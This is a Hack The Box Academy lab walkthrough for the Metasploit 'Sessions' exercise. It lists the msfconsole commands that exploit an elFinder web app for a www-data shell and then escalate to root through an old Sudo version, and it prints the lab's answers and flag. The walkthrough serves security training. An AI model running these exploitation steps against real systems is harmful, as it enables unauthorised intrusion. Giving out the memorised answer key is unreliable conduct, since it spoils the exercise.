Sessions — Using the Metasploit Framework Module — HTB Walkthrough

TIER 0 MODULE: USING THE METASPLOIT FRAMEWORK

SECTION: Sessions

Please open your pwnbox or connect to the vpn in order to complete the tasks.

If you are not registered in HTB Academy, then use this link to register now: https://referral.hackthebox.com/mzxKOJt

1. The target has a specific web application running that we can find by looking into the HTML source code. What is the name of that web application?

Spawn the target, and visit the target IP in a browser.

After that, you can right-click and see ‘page source’. Or write “view-source:<target-ip>” into the URL bar.

You can see the service name, in many lines, submit that as the answer.

Answer: elFinder

2. Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?

First, launch metasploit.

msfconsole -q

and search for the exploit.

search elfinder

Select the most relevant looking exploit, I selected 3.

use 3

Configure your attack… it is always a good practice to show options to know what exactly you have to configure for this attack.

set rhost <target-ip>

set lhost <your-vpn-ip>

Start the attack…

run

After a successful connection, type (for username)

getuid

Answer: www-data

3. The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.

Continue as the same in the previous question. In the meterpreter type

background

Background this session, and start searching for the ‘sudo’ exploit.

View the session number, we will need it later.

sessions

now, find for the exploit

Number 60 looks the most relevant, so select that.

use 60

💡 Number may change with the time, You must start finding via title.

Now the session we backgrounded,

set session <number>

Also DO NOT forget to change lhost again.

set lhost <your-vpn-ip>

and start attack…

run

After a successful attack, find the flag.txt

search -f flag.txt

It returned /root/flag.txt, view the file.

cat /root/flag.txt

Answer: HTB{5e55ion5_4r3_sw33t}

Meterpreter has it’s own commands, you can list them by help command.

Still stuck? Watch video!

☣️ HAPPY ETHICAL HACKING ☣️

DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)

The Malware Mender Walkthroughs